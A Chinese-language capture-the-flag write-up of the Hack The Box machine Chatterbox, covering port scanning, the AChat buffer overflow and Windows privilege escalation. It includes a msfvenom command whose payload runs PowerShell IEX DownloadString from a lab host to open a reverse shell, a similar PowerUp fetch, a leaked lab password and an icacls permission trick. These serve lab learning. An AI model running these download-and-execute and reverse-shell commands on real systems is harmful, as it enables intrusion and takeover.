基本信息
data:image/s3,"s3://crabby-images/01ee4/01ee40d899de9dcd0786b72ab6de5417a1e3e71a" alt=""
端口扫描
需要UDP全端口,非常见端口9255和9256:
1 | sudo nmap -sU -p9255,9256 10.10.10.74 |
9256
搜索相关资料,这是Achat端口:
- Port 9256 (tcp/udp) :: SpeedGuide
https://www.speedguide.net/port.php?port=9256
Achat bof
- Achat 0.150 beta7 - Remote Buffer Overflow - Windows remote Exploit
https://www.exploit-db.com/exploits/36025
exploit
msf里的模块打到的meterpreter几秒后就会断,加上auto migrate也一样:
data:image/s3,"s3://crabby-images/4bf25/4bf25ceb280fff939fb8aff9c4e589b27c2393e5" alt=""
Powershell
执行方式换成powershell reverse就可以,比较稳定:
1 | msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.6:7777/Invoke-PowerShellTcp.ps1')" 。。。 |
data:image/s3,"s3://crabby-images/72824/72824d1ef5e3636dddb9d56afc1de031a82047ac" alt=""
data:image/s3,"s3://crabby-images/da5b0/da5b04bed7a3b3df75d1c04ca376493a29c6d2c1" alt=""
data:image/s3,"s3://crabby-images/232fc/232fc256a9fb3ac5a5097eae3ee5c5a8241d83e9" alt=""
user flag
alfred用户桌面得到user flag:
data:image/s3,"s3://crabby-images/8bcba/8bcbaa56b3d5b2344e24f7a34f1b84e0a1185095" alt=""
提权信息
预期
powerup可以发现注册表中的密码
1 | IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.6:7777/PowerUp.ps1') |
这个密码就是管理员密码
非预期
权限配置错误,Alfred对root.txt没有权限,但对Desktop有权限:
data:image/s3,"s3://crabby-images/587e5/587e576e2ab87663bed1a972bd979f4efd0197f1" alt=""
提权 && root flag
icacls
直接修改权限后读取root.txt:
data:image/s3,"s3://crabby-images/5c157/5c1579dcccc84c894ef6f8ea54e49c24e79a3d76" alt=""
Administrator
使用密码得到Administrator session,执行reverse shell:
1 | $passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; |
data:image/s3,"s3://crabby-images/553a2/553a2cfc5f13b64532ab6dd1e44822994b6a8e2d" alt=""
data:image/s3,"s3://crabby-images/e449d/e449d600f3f77ed12f2e1645cb547e601b4461ef" alt=""
参考资料
- Port 9256 (tcp/udp) :: SpeedGuide
https://www.speedguide.net/port.php?port=9256 - Achat 0.150 beta7 - Remote Buffer Overflow - Windows remote Exploit
https://www.exploit-db.com/exploits/36025 - HTB: Chatterbox | 0xdf hacks stuff
https://0xdf.gitlab.io/2018/06/18/htb-chatterbox.html - https://www.hackthebox.eu/home/machines/writeup/123
- HackTheBox - Chatterbox - YouTube
https://www.youtube.com/watch?v=_dRrvJNdP-s&feature=youtu.be&ab_channel=IppSec